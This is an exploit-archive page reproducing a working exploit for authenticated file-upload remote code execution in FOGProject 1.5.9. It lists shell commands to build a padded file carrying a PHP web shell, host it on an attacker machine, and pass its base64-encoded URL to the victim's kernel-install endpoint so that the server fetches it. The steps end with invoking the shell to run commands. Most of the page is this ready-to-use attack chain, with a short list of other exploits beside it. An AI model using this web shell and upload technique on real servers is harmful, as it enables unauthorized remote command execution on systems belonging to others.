Fogproject 1.5.9 file upload rce (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-04-29 | Type : webapps | Platform : php
This exploit / vulnerability Fogproject 1.5.9 file upload rce (authenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated)
# Date: 2021-04-28
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://fogproject.org
# Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip
# Tested on: Debian 10

On the Attacker Machine:

1) Create an empty 10Mb file.
dd if=/dev/zero of=myshell bs=10485760 count=1

2) Add your PHP code to the end of the file created in the step 1.
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell

3) Put the file "myshell" accessible through HTTP.
$ cp myshell /var/www/html

4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP).
$ echo "http://ATTACKER_IP/myshell" | base64
aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=

5) Visit
http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64
Example:
http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64

6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php
and click on Install.

7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname

Fogproject 1.5.9 file upload rce (authenticated)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Fogproject 1.5.9 file upload rce (authenticated) Vulnerability / Exploit